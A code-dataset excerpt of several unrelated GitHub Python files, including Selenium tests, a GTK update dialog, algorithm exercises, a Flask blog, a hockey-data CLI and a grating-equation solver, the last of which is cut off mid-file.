baiduAPI_translate_main('这是中文')\n # baiduAPI_translate_main('翻译成法语', 'fra')","repo_name":"Wang-future/audioProgram","sub_path":"code/audioProgram/processData/extractConala/enToChina.py","file_name":"enToChina.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6994894005","text":"import time\n\nfrom Base import initialiseDriver, commonMethods\nfrom Pages import alert_page\nfrom selenium import webdriver\nwebdriver.Chrome()\n\ndef test_verify_simple_alert_accept():\n browser = initialiseDriver.startBrowser('https://www.way2automation.com/way2auto_jquery/alert.php#load_box')\n c = commonMethods.commonMethods(browser)\n a = alert_page.Alerts(browser, 'Alerts')\n c.switch_to_iframe('iframe_xpath', 'Alerts')\n a.click_button('click_simple_alertbox_xpath')\n a.click_simple_alert_box()\n\ndef test_verify_input_alert_accept():\n browser = initialiseDriver.startBrowser('https://www.way2automation.com/way2auto_jquery/alert.php#load_box')\n c = commonMethods.commonMethods(browser)\n a = alert_page.Alerts(browser, 'Alerts')\n a.click_button('input_section_xpath')\n c.switch_to_iframe('iframe1_xpath', 'Alerts')\n a.click_button('click_inputbox_xpath')\n time.sleep(3)\n a.click_input_alert_box()\n time.sleep(3)\n c.switch_to_iframe('iframe1_xpath', 'Alerts')\n a.click_button('click_inputbox_xpath')\n a.dismiss_alert_box()\n time.sleep(3)\n","repo_name":"ysingh03/E2E_framwork_selenium_python","sub_path":"TC/test_alerts.py","file_name":"test_alerts.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12608332286","text":"import threading\n\nimport pygtk\npygtk.require('2.0')\nimport gtk\nimport gobject\n\nfrom message import Message\nfrom core.service_update import ServiceUpdate\n\nimport media\nimport core.cons as cons\n\nclass UpdateManager(gtk.Dialog, ServiceUpdate):\n\t\"\"\"\"\"\"\n\tdef __init__(self, parent, config, info=None):\n\t\t\"\"\"\"\"\"\n\t\tgtk.Dialog.__init__(self)\n\t\tServiceUpdate.__init__(self, config)\n\t\tself.set_transient_for(parent)\n\t\tself.parent_widget = parent\n\n\t\tself.installing = False\n\t\tself.checking_version = False\n\t\tself.remote_info = info\n\n\t\tself.set_icon_from_file(media.ICON_UPDATE)\n\t\tself.set_title((\"Update Manager\"))\n\t\tself.set_size_request(400,300)\n\n\t\t# treeview\n\t\tframe = gtk.Frame()\n\t\tself.vbox.pack_start(frame)\n\t\tframe.set_size_request(200, -1)\n\t\tframe.set_border_width(10)\n\t\tlabel = gtk.Label()\n\t\tlabel.set_markup(\"%s\" % (\"Update Services\"))\n\t\tframe.set_label_widget(label)\n\t\tscroll = gtk.ScrolledWindow()\n\t\tframe.add(scroll)\n\t\tscroll.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)\n\t\tself.treeview = gtk.TreeView(gtk.ListStore(gtk.gdk.Pixbuf, str, bool, str, gobject.TYPE_PYOBJECT))\n\t\tscroll.add(self.treeview)\n\n\t\tself.treeview.set_rules_hint(True)\n\t\tself.treeview.set_headers_visible(False)\n\n\t\ttree_icon = gtk.TreeViewColumn('Icon') \n\t\ticon_cell = gtk.CellRendererPixbuf()\n\t\ttree_icon.pack_start(icon_cell, True)\n\t\ttree_icon.add_attribute(icon_cell, 'pixbuf', 0)\n\t\ttree_icon.set_property('min-width', 100)\n\t\tself.treeview.append_column(tree_icon)\n\n\t\ttree_name = gtk.TreeViewColumn('Name') \n\t\tname_cell = gtk.CellRendererText()\n\t\ttree_name.pack_start(name_cell, True)\n\t\ttree_name.add_attribute(name_cell, 'text', 1)\n\t\ttree_name.set_property('min-width', 200)\n\t\tself.treeview.append_column(tree_name)\n\n\t\ttree_add = gtk.TreeViewColumn('Add')\n\t\tadd_cell = gtk.CellRendererToggle()\n\t\tadd_cell.connect(\"toggled\", self.toggled)\n\t\ttree_add.pack_start(add_cell, True)\n\t\ttree_add.add_attribute(add_cell, 'active', 2)\n\t\tself.treeview.append_column(tree_add)\n\n\t\t#status\n\t\thbox = gtk.HBox()\n\t\tself.vbox.pack_start(hbox, False, False, 5)\n\n\t\tself.status_icon = gtk.image_new_from_stock(gtk.STOCK_REFRESH, gtk.ICON_SIZE_MENU)\n\t\thbox.pack_start(self.status_icon, False, False, 10)\n\t\tself.status_label = gtk.Label(\"Checking for updates.\")\n\t\thbox.pack_start(self.status_label, False, False, 5)\n\t\tself.progress = gtk.ProgressBar()\n\t\thbox.pack_start(self.progress, True, True, 20)\n\n\t\t#action area\n\t\tcancel_button = gtk.Button(None, gtk.STOCK_CANCEL)\n\t\tadd_button = gtk.Button(None, gtk.STOCK_ADD)\n\t\tself.action_area.pack_start(cancel_button)\n\t\tself.action_area.pack_start(add_button)\n\t\tcancel_button.connect(\"clicked\", self.close)\n\t\tadd_button.connect(\"clicked\", self.install)\n\n\t\tself.connect(\"response\", self.close)\n\t\tself.show_all()\n\n\t\tself.progress.hide()\n\n\t\tgobject.timeout_add(200, self.load_updates)\n\n\t\tself.run()\n\n\tdef load_updates(self):\n\t\t\"\"\"\"\"\"\n\t\tif not self.checking_version:\n\t\t\tself.checking_version = True\n\t\t\tif self.get_updates():\n\t\t\t\tself.check_updates()\n\t\t\telse:\n\t\t\t\tif self.remote_version == None:\n\t\t\t\t\ttitle = \"Not available!\"\n\t\t\t\t\tmessage = \"Update Manager can't connect to server.\\nTry again later.\"\n\t\t\t\telif self.remote_outdated:\n\t\t\t\t\ttitle = \"Brand new!\"\n\t\t\t\t\t#message = \"Version %s\\nHas no updates available yet.\" % cons.TUCAN_VERSION\n\t\t\t\t\tmessage = \"Version %s\\nRC releases have no updates.\" % cons.TUCAN_VERSION\n\t\t\t\telse:\n\t\t\t\t\ttitle = \"Outdated!\"\n\t\t\t\t\tmessage = \"Version %s released!\\nPlease update and enjoy new features.\" % self.remote_version\n\t\t\t\tMessage(self, cons.SEVERITY_ERROR, title, message)\n\t\t\t\tgobject.idle_add(self.close)\n\t\t\tself.checking_version = False\n\n\tdef toggled(self, button, path):\n\t\t\"\"\"\"\"\"\n\t\tmodel = self.treeview.get_model()\n\t\tactive = True\n\t\tif button.get_active():\n\t\t\tactive = False\n\t\tbutton.set_active(active)\n\t\tmodel.set_value(model.get_iter(path), 2, active)\n\n\tdef check_updates(self):\n\t\t\"\"\"\"\"\"\n\t\tmodel = self.treeview.get_model()\n\t\tdefault_icon = gtk.gdk.pixbuf_new_from_file_at_size(media.ICON_UPDATE, 32, 32)\n\n\t\tupdated = 0\n\t\tnew = 0\n\t\tfor service, options in self.updates.items():\n\t\t\tif options[2]:\n\t\t\t\ticon = gtk.gdk.pixbuf_new_from_file_at_size(options[2], 32, 32)\n\t\t\t\tupdated += 1\n\t\t\telse:\n\t\t\t\ticon = default_icon\n\t\t\t\tnew += 1\n\t\t\tif model:\n\t\t\t\tmodel.append([icon, service, False, options[0], options[1]])\n\n\t\tself.status_icon.set_from_stock(gtk.STOCK_DIALOG_WARNING, gtk.ICON_SIZE_BUTTON)\n\t\tself.status_label.set_label(\"%i New and %i Updated.\" % (new, updated))\n\t\tif updated == 0 and new == 0:\n\t\t\tgobject.timeout_add_seconds(5, self.close)\n\n\tdef install(self, button):\n\t\t\"\"\"\"\"\"\n\t\tself.progress.show()\n\t\tself.status_icon.set_from_stock(gtk.STOCK_GO_DOWN, gtk.ICON_SIZE_MENU)\n\t\tself.status_label.set_label(\"Installing\")\n\t\tself.action_area.set_sensitive(False)\n\t\tth = threading.Thread(group=None, target=self.install_all, name=None)\n\t\tth.start()\n\n\tdef install_all(self):\n\t\t\"\"\"\"\"\"\n\t\tself.installing = True\n\t\tmodel = self.treeview.get_model()\n\n\t\tinstall_targets = []\n\t\tupdate_iter = model.get_iter_root()\n\t\twhile update_iter:\n\t\t\tif model.get_value(update_iter, 2):\n\t\t\t\tinstall_targets.append(model.get(update_iter, 1, 3, 4))\n\t\t\tupdate_iter = model.iter_next(update_iter)\n\t\tif len(install_targets) > 0:\n\t\t\tcont = 0\n\t\t\tself.progress.set_text(\"%i of %i\" % (cont, len(install_targets)))\n\t\t\tfor service_name, service_dir, archive in install_targets:\n\t\t\t\tif self.install_service(service_name, service_dir, archive):\n\t\t\t\t\tcont += 1\n\t\t\t\t\tself.progress.set_fraction(float(cont)/len(install_targets))\n\t\t\t\t\tself.progress.set_text(\"%i of %i\" % (cont, len(install_targets)))\n\t\t\tif cont != len(install_targets):\n\t\t\t\tmessage = \"Problem updating some services \\nTry again later.\"\n\t\t\telse:\n\t\t\t\tmessage = \"Save your configuration and restart Tucan \\nto apply service changes.\"\n\t\t\tgobject.idle_add(self.restart, message)\n\t\t\tself.installing = False\n\t\t\tgobject.idle_add(self.close)\n\t\telse:\n\t\t\tself.installing = False\n\t\t\tgobject.idle_add(self.close)\n\n\tdef restart(self, message):\n\t\t\"\"\"\"\"\"\n\t\tMessage(self.parent_widget, cons.SEVERITY_WARNING, \"Restart Needed.\", message)\n\n\tdef close(self, widget=None, other=None):\n\t\t\"\"\"\"\"\"\n\t\tif not self.installing:\n\t\t\tself.destroy()\n\nif __name__ == \"__main__\":\n\tfrom config import Config\n\tx = UpdateManager(None, Config(), None)\n","repo_name":"richjdowney/immigration_data_etl_analysis","sub_path":"src/ui/gtk/update_manager.py","file_name":"update_manager.py","file_ext":"py","file_size_in_byte":6182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29511232276","text":"import requests\nimport json\ndef requests_load(idx):\n headers = {\"Content-Type\": \"application/json;charset=utf8\"}\n url = \"http://127.0.0.1:8388/miniapi/event/getcamera\"\n _data = {\n\n \n \"cameraid\": str(idx)\n \n\n }\n\n res = requests.post(url=url, headers=headers, json=_data).text\n return res\n\n","repo_name":"xiaojunjun65/G235","sub_path":"utils/http_seve.py","file_name":"http_seve.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"26539904007","text":"'''\n문제 : 단지번호 붙이기\n난이도 : 실버 1\n링크 : https://www.acmicpc.net/problem/2667\n'''\n\nfrom collections import deque\n\nn = int(input())\ngraph = []\nfor _ in range(n):\n graph.append(list(map(int, input())))\ndx = [0, 0, -1, 1]\ndy = [1, -1, 0, 0]\n\n#단지의 세대 수\nnums = []\ncount = 0\n\ndef dfs(x, y):\n if x < 0 or x >= n or y < 0 or y >= n:\n return False\n if graph[x][y] == 1:\n global count\n count += 1\n graph[x][y] = 0\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n dfs(nx, ny)\n return True\n return False\n\ndef bfs(x, y):\n global graph\n n = len(graph)\n q = deque()\n q.append((x, y))\n graph[x][y] = 0\n count = 1\n \n while q:\n # 큐에 들어있는 친구 하나 뽑고 상하좌우 체크\n x, y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if nx < 0 or nx >= n or ny < 0 or ny >= n:\n continue\n # 만약 주변에 집이 있으면, 큐에 해당 좌표를 늘려주고 현재 집은 0으로 미방문되도록 설정\n # count += 1 해줘서 단지 내 집 개수 추가\n if graph[nx][ny] == 1:\n q.append((nx, ny))\n graph[nx][ny] = 0\n count += 1\n return count\n\n\nfor i in range(n):\n for j in range(n):\n # 모임인 집이 존재한다면\n # dfs 풀이\n '''\n if dfs(i, j) == True:\n nums.append(count)\n count = 0\n '''\n # bfs 풀이\n if graph(i, j) == 1:\n nums.append(bfs(i, j))\n \n\nnums.sort()\nprint(len(nums))\nfor i in nums:\n print(i)","repo_name":"kkkapuq/PS_study","sub_path":"Boong/Python/백준/DFS,BFS/230319_백준_2667_단지번호 붙이기/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26490044924","text":"# task3\r\nfrom functools import wraps\r\n\r\n\r\ndef arg_rules(type_: type, max_length: int, contains: list):\r\n def stopwords_inner(func):\r\n @wraps(func)\r\n def wrap(*args, **kwargs):\r\n res = func(*args, **kwargs)\r\n user_name = ''.join(args)\r\n\r\n if len(user_name) > max_length:\r\n return \"User name cannot hold more than 15 chars\"\r\n if not isinstance(user_name, type_):\r\n return \"User name must be a string\"\r\n for word in contains:\r\n if word not in user_name:\r\n return 'Should contain needed characters'\r\n return res\r\n\r\n return wrap\r\n\r\n return stopwords_inner\r\n\r\n pass\r\n\r\n\r\n@arg_rules(type_=str, max_length=15, contains=['05', '@'])\r\ndef create_slogan(name: str) -> str:\r\n return f\"{name} drinks pepsi in his brand new BMW!\"\r\n\r\n\r\nslogan = create_slogan('Clown205@')\r\nprint(slogan)","repo_name":"DantesMindless/lesson14","sub_path":"task14-3.py","file_name":"task14-3.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74575529080","text":"import asyncio\nimport os\nimport os.path\nimport sys\nfrom datetime import datetime\n\nimport asyncpg.exceptions\nimport click\nimport click_datetime\nfrom alembic.command import upgrade\nfrom alembic.config import Config\n\nfrom puckdb import db, fetch, server\n\nDATE_PARAM = click_datetime.Datetime(format='%Y-%m-%d')\n\n\ndef abort_if_false(ctx, _, value):\n if not value:\n ctx.abort()\n\n\ndef _setup():\n loop.run_until_complete(db.setup())\n\n\n@click.command(help='Initialize the database')\ndef init():\n loc = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n config = Config(os.path.join(loc, 'alembic.ini'))\n upgrade(config, 'head')\n teams()\n\n\n@click.command(help='Get all teams')\ndef teams():\n loop.run_until_complete(fetch.get_teams())\n\n\n@click.command(help='Remove all data from the database')\n@click.option('--yes', is_flag=True, callback=abort_if_false,\n expose_value=False,\n prompt='Are you sure you want to drop the database?')\ndef drop():\n db.drop()\n\n\n@click.command()\n@click.option('--from-date', type=DATE_PARAM, default=datetime(2016, 10, 1))\n@click.option('--to-date', type=DATE_PARAM, default=datetime.now())\ndef get(from_date, to_date):\n try:\n games = loop.run_until_complete(fetch.get_games(from_date=from_date, to_date=to_date))\n click.echo(f'Fetched {len(games)} games')\n if games:\n click.echo(f'First: {games[0][\"id\"]}')\n click.echo(f'Most recent: {games[-1][\"id\"]}')\n except asyncpg.exceptions.UndefinedTableError:\n click.echo('ERROR: Please run `puckdb init` to initialize this DB first.')\n sys.exit(1)\n\n\n@click.command()\ndef serve():\n server.run(loop)\n\n\n@click.group()\n@click.version_option()\ndef main():\n if not os.getenv('PUCKDB_DB_DATABASE'):\n click.echo('ERROR: `PUCKDB_DB_DATABASE` environment variable not specified.')\n sys.exit(1)\n _setup()\n\n\nmain.add_command(get)\nmain.add_command(init)\nmain.add_command(teams)\nmain.add_command(drop)\nmain.add_command(serve)\n\nloop = asyncio.get_event_loop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"aaront/puckdb","sub_path":"puckdb/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"21839605202","text":"import numpy as np\n\n\nclass Board():\n def __init__(self) -> None:\n self.board = np.zeros((3,3))\n self.markers = [[2,2,2],[2,2,2]]\n self.moves = []\n \n def check_winner(self):\n if np.any(np.all(self.board > 0, axis=0)):\n return 1\n if np.any(np.all(self.board > 0, axis=1)):\n return 1\n if np.any(np.all(self.board < 0, axis=0)):\n return -1\n if np.any(np.all(self.board < 0, axis=1)):\n return -1\n\n if (self.board[0,0] > 0) and (self.board[1,1] > 0) and (self.board[2,2] > 0):\n return 1\n if (self.board[0,2] > 0) and (self.board[1,1] > 0) and (self.board[2,0] > 0):\n return 1\n if (self.board[0,0] < 0) and (self.board[1,1] < 0) and (self.board[2,2] < 0):\n return -1\n if (self.board[0,2] < 0) and (self.board[1,1] < 0) and (self.board[2,0] < 0):\n return -1\n return 0\n \n def get_legal_moves(self, player):\n legal_moves = []\n for i,row in enumerate(self.board):\n for j,square in enumerate(row):\n for size, n_marker in enumerate(self.markers[0 if player==1 else 1]):\n if n_marker <= 0:\n continue\n if np.abs(square) < (size+1):\n legal_moves += [(i, j, size+1, player)]\n if len(legal_moves) == 0:\n return [None]\n return legal_moves\n \n def do_move(self, move):\n self.moves += [move]\n self._do_move(move)\n\n def _do_move(self, move):\n i, j, size, player = move\n self.board[i,j] = size*player\n self.markers[0 if player==1 else 1][size-1] -= 1\n\n def undo_move(self):\n self.board = np.zeros((3,3))\n self.markers = [[2,2,2],[2,2,2]]\n self.moves = self.moves[:-1]\n for move in self.moves:\n self._do_move(move)\n \n def minimax(self, depth, maximizingPlayer, alpha, beta, none_counter=0):\n \n if self.check_winner() != 0:\n return self.check_winner()\n\n if none_counter > 1:\n return maximizingPlayer*20\n \n if maximizingPlayer:\n best = -10\n # Recur for left and right children\n for move in self.get_legal_moves(1):\n if move is not None:\n self.do_move(move)\n none_counter = 0\n else:\n none_counter += 1\n\n val = self.minimax(depth + 1, False, alpha, beta, none_counter)\n if move is not None:\n self.undo_move()\n best = max(best, val)\n alpha = max(alpha, best)\n \n # Alpha Beta Pruning\n if beta <= alpha:\n break\n return best\n \n else:\n best = 10\n # Recur for left and\n # right children\n for move in self.get_legal_moves(-1):\n if move is not None:\n self.do_move(move)\n none_counter = 0\n else:\n none_counter += 1\n val = self.minimax(depth + 1, True, alpha, beta, none_counter)\n if move is not None:\n self.undo_move()\n best = min(best, val)\n beta = min(beta, best)\n \n # Alpha Beta Pruning\n if beta <= alpha:\n break\n \n return best\n \n\nboard = Board()\n# print(board.get_legal_moves(1))\ntry:\n print(board.minimax(0, True, -10, 10))\nexcept:\n print(\"error\")\n\n\n","repo_name":"demolburgie/demolburgie.github.io","sub_path":"random/tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22085866570","text":"import requests\nfrom urllib.parse import quote_plus\n\npayload = {\"init_headers\": \"\", \"tasks\": {\"task-1\": {\"task_type\": \"get_screenshot\", \"task_code\": \"\"}}}\nresponse = requests.post(\"http://0.0.0.0:5000/execute?url={url}&viewport=1280x720&timeout=180&method=get\"\n \"&load_images=0&token=iamlazydeveloper\".format(\n url=quote_plus(\"http://invana.io\")),\n data=payload)\nprint(response.status_code)\nprint(response.json())\n","repo_name":"invana/browser-engine","sub_path":"tests/test_restful.py","file_name":"test_restful.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"8195389888","text":"# Дельта-правило\n\n# Сеть училась распозновать 5ть на картинке\n# 1. В сеть подали 5 и она её узнала, значит дельта ошибки (=) равна 0 и соответствено ничего делать не нужно.\n# 2. В сеть подали 5, но она её не узнала и выдала друое значение, в этом случае мы прибавляем вес, который мы определили в скорости обучения = коэффициент\n# 3. В сеть подали, например 7, но она сказала что это 5ть, в этом случае мы вычитаем вес, который мы определили в скорости обучения = коэффициент. \n# 4. В сеть например, подали 7 и сеть прявильно определила, что это не 5ть, значит дельта ошибки (=) равна 0 и соответствено ничего делать не нужно.\n\nimport random\n# Коэффициент при Х\nk = random.uniform(-5, 5)\n\n# Свободный член урованения прямой - c\nc = random.uniform(-5, 5)\nprint('Начальная прямая линия: ', k, '* x + ', c)\n\nrate = 0.0001 # скорость обучения = значение на которое меняется вес связи в соответствии с дельта-правилом\n\n\n# Набор точек X:Y\ndata = {22: 150, 23: 155, 24: 160, 25: 162, 26: 171, 27: 174, 28: 180, 29: 183, 30: 189, 31: 192}\n\n\n# Расчёт Y\ndef proceed(x):\n return x * k + c\n\n# Тренеровка сети\nfor i in range (100000):\n # Получить случайную X-координату точки\n x = random.choice(list(data.keys()))\n # Получить соответствующую Y-координату точки\n true_result = data [x]\n # Получить ответ сети\n out = proceed(x)\n # Считаем ошибку сети\n delta = true_result - out\n # Меняем вес при x в соответствии с дельта-правилом\n k += delta * rate * x\n # Меняем вес при постоянном входе в соответствии с дельта-правилом\n c += delta * rate\n\n# Вывод данных начальной прямой линии\n\nprint('Готовая прямая: Y = ', k, '* x + ', c)\n\n\n\n\n\n\n\n","repo_name":"romanskrypka/AI","sub_path":"basic_py/ai_06.py","file_name":"ai_06.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9899251970","text":"'''Programs that simulates BBS \r\n Name: Othniel KONAN\r\n Student number: KNNOTH001\r\n Date: 2014/04/12'''\r\n\r\n#definition of global variable\r\nmessage = \"no message yet\"\r\ni = True \r\nfiles=['42.txt','1015.txt']\r\n\r\n#function to print the menu and to prompt the user\r\ndef menu():\r\n print('Welcome to UCT BBS\\nMENU')\r\n print('(E)nter a message\\n(V)iew message\\n(L)ist files\\n(D)isplay file\\ne(X)it\\nEnter your selection:')\r\n#function that return the lower-case of a string input \r\ndef prompt():\r\n choice = input()\r\n return choice.lower()\r\n\r\n#function that executes instructions according to the input of the user\r\ndef choice(ans):\r\n global message\r\n global i\r\n if ans == 'e':\r\n message = input('Enter the message:\\n')\r\n elif ans == 'v':\r\n print('The message is:',message)\r\n elif ans == 'l':\r\n print('List of files: ',files[0],', ',files[1],sep='') \r\n elif ans == 'd':\r\n file=input('Enter the filename:\\n')\r\n if file == '42.txt':\r\n print('The meaning of life is blah blah blah ...')\r\n elif file == '1015.txt':\r\n print('Computer Science class notes ... simplified\\nDo all work\\nPass course\\nBe happy')\r\n else:\r\n print('File not found')\r\n else:\r\n i = False\r\n\r\n#main function of the program \r\ndef main():\r\n global i\r\n while i:\r\n menu()\r\n ans = prompt()\r\n choice(ans)\r\n print('Goodbye!')\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_5/knnoth001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39117362155","text":"input_data=input()\nrow=int(input_data[1])\ncolumn=int(ord(input_data[0]))-int(ord('a'))+1 ##유니코드 오더 위치\n\n#나이트가 이동하는 8가지방향\nsteps = [(-2,-1),(-1,-2),(1,-2),(2,-1),(2,1),(1,2),(-1,-2),(-2,1)]\n\n#8방향 이동가능?\nresult=0\nfor step in steps:\n next_row=row+step[0]\n next_column=column+step[1]\n #되면 카운트 증가\n if 0 I:\n I = J\n subfamily = q\n q = parent\n sf_names = [t.name for t in subfamily.get_terminals()]\n families[\"Group\" + str(group)] = (sf_names, subfamily)\n already_grouped = already_grouped.union(set(sf_names))\n group += 1\n # Resolve families by keeping only the largest, i.e., if a subtree is contained within another, remove it\n remove_these = set()\n for family in families:\n f_tree = families[family][1]\n f_tree_size = len(families[family][0])\n for other_family in families:\n of_tree = families[other_family][1]\n of_tree_size = len(families[other_family][0])\n # If the current family subtree includes the `other' family tree, then we don't consider the\n # other family as an individual group and mark it for removal\n if f_tree.is_parent_of(of_tree) and of_tree_size < f_tree_size:\n remove_these.add(other_family)\n new_families = dict()\n cnt = 0\n for k, v in families.items():\n if k not in remove_these:\n new_name = \"Group%i\" % cnt\n #Remove [0] to assign a tuple, where [0] is the list of seq names and [1] is the clade object\n new_families[new_name] = v[0]\n cnt += 1\n self.sub_families = new_families\n return new_families\n\n def change_leaf_names_to_sequence(self, mapping):\n \"\"\"\n Change the leaf names to the actual sequence\n mapping should be a dictionary with [current_name : sequence] (sequence can also be whatever you want)\n \"\"\"\n leaves = self.tree.get_terminals()\n for leaf in leaves:\n leaf.name = mapping[leaf.name]\n\n def write_annotations(self, filename):\n \"\"\"\n Write an annotation file containing columns for name and the identified subgroup\n :param filename:\n :return:\n \"\"\"\n assert self.sub_families, \"Call 'find_sub_families' first\"\n with open(filename, 'w') as fh:\n print >> fh, \"Name\\tGroup\\tSequence\"\n for group, results in self.sub_families.items():\n for name in results:\n print >> fh, \"%s\\t%s\\t%s\" % (name, group, self.seqs_dict[name].sequence)\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"julianzaugg/PDProcessing","sub_path":"subgroup.py","file_name":"subgroup.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41722204980","text":"from flask import render_template, url_for, flash, redirect, request\nfrom flaskblog.__innit__ import app, db, bcrypt\nfrom flaskblog.forms import RegistrationForm, LoginForm, IssueKeywordForm, GejalaForm\nfrom flaskblog.models import User, ContactHistory, Symptoms\nfrom flask_login import login_user, logout_user, current_user, login_required\nimport requests as req\nimport json\nimport os\nimport pickle\n\nfrom get_data import convert_tweets\n\n#MAIN LOGIN PAGE\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('main_login.html', title = 'Home')\n\n#LOGIN PAGE\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n #Validation for user\n #String validation\n if form.validate_on_submit():\n return redirect(url_for('main_page'))\n return render_template('login.html', title='Login', form=form)\n\n#MAIN PAGE\n@app.route('/main_page', methods = ['GET','POST'])\ndef main_page():\n form = IssueKeywordForm()\n #Save submitted file\n if form.validate_on_submit():\n query = request.form['query']\n fromdate = request.form['fromdate']\n todate = request.form['todate']\n result_dict = {'query':query, 'fromDate':fromdate, 'toDate':todate}\n #Convert to specified json format\n result_dict = convert_tweets(result_dict)\n result_dict = json.dumps(result_dict)\n #Save cookie and redirect to /show_result\n response = redirect(url_for('show_result'))\n response.set_cookie('YourSessionCookie', result_dict)\n return response\n\n return render_template('main_page.html', title = 'Cek resiko infeksi online', form = form)\n\n\n@app.route('/result', methods = ['POST'])\ndef result():\n\n #Jsonify body post\n json = request.get_json()\n return convert_tweets(json)\n\n\n@app.route('/show_result', methods = ['GET'])\ndef show_result():\n\n result = request.cookies.get('YourSessionCookie')\n result = json.loads(result)\n\n #print(os.getcwd())\n #with open('./flaskblog/static/dummy.pickle','rb') as f:\n # result = pickle.load(f)\n \n\n return render_template('result_page.html', title = 'Halaman Hasil', result=result)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n@app.route('/profile')\n@login_required\ndef profile():\n post = ContactHistory.query.all()\n return render_template('profile.html', title = ' Profil', posts=post)\n\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('home'))","repo_name":"farhanhanavi/DCC_SMM_MVP","sub_path":"flaskblog/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73256733881","text":"def solution(N):\n factorCount = 0\n factors = []\n i = 1\n \n while i*i < N:\n \n if N%i == 0:\n factors.append((i,N//i))\n \n \n i+=1\n\n if i*i == N:\n factors.append((i,N//i))\n\n minPerameter = float(\"inf\")\n\n for pairs in factors:\n currentParameter = 2*(pairs[0]+pairs[1])\n minPerameter = min(minPerameter,currentParameter)\n\n\n return minPerameter\n\nprint(solution(30)) \n ","repo_name":"ankitbrahmbhatt1997/Python-Datastructures-and-ALgorithms","sub_path":"codility/Prime/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40877754800","text":"from math import isnan\n\nfrom pure_ta import Quote, ta\n\n# Expected results.\n# https://docs.google.com/spreadsheets/d/1n3-bYh1V0JMStMBIJKE6CSJCLMMEP19tD7vGkRrtq6I/edit?usp=sharing.\n\n\ndef test_wma_returns_correct_number_of_results(get_default: list[Quote]):\n \"\"\"Sma results should have the correct length.\"\"\"\n wma = ta.wma()\n results = [wma(q.close) for q in get_default]\n assert len(results) == 502\n\n\ndef test_wma_returns_correct_number_of_results_without_nan(get_default: list[Quote]):\n \"\"\"Wma results should have the correct number of results without NaN.\"\"\"\n wma = ta.wma(length=20)\n results = [wma(q.close) for q in get_default]\n non_nan_results = [r for r in results if not isnan(r)]\n assert len(non_nan_results) == 483\n\n\ndef test_wma_returns_correct_calculation_results(get_default: list[Quote]):\n \"\"\"Wma results should be accurate.\"\"\"\n wma = ta.wma(length=20)\n results = [wma(q.close) for q in get_default]\n result149 = results[149]\n result501 = results[501]\n\n # toPrecision(4) in Dart equals round with 3 decimal places in Python\n assert round(result149, 4) == 235.5253\n assert round(result501, 3) == 246.511\n","repo_name":"Takin-Profit/pure_ta","sub_path":"tests/test_wma.py","file_name":"test_wma.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12188764828","text":"\nimport scipy.constants as codata\nimport numpy\n\n\n\nm2ev = codata.c * codata.h / codata.e # lambda(m) = m2eV / energy(eV)\n\n\n# # used by Luca\n# codata_h = numpy.array(6.62606957e-34)\n# codata_ec = numpy.array(1.602176565e-19)\n# codata_c = numpy.array(299792458.0)\n# m2ev = codata_c * codata_h / codata_ec # lambda(m) = m2eV / energy(eV)\n\ndef solve_grating_equation(line_density=100000,wavelength=10e-10,c=1.10,order=1,method='beta'):\n\n if method == 'beta': # beta!!\n\n A = (1.0 - 1.0 / c ** 2)\n B = -2 * order * line_density * wavelength\n C = order ** 2 * line_density ** 2 * wavelength ** 2 - 1 + 1.0 / c ** 2\n\n Delta = B ** 2 - 4 * A * C\n\n sinbeta1 = (-B + numpy.sqrt(Delta)) / 2 / A\n sinbeta2 = (-B - numpy.sqrt(Delta)) / 2 / A\n\n # print(\"Discriminant=%f, sinbeta1=%f, 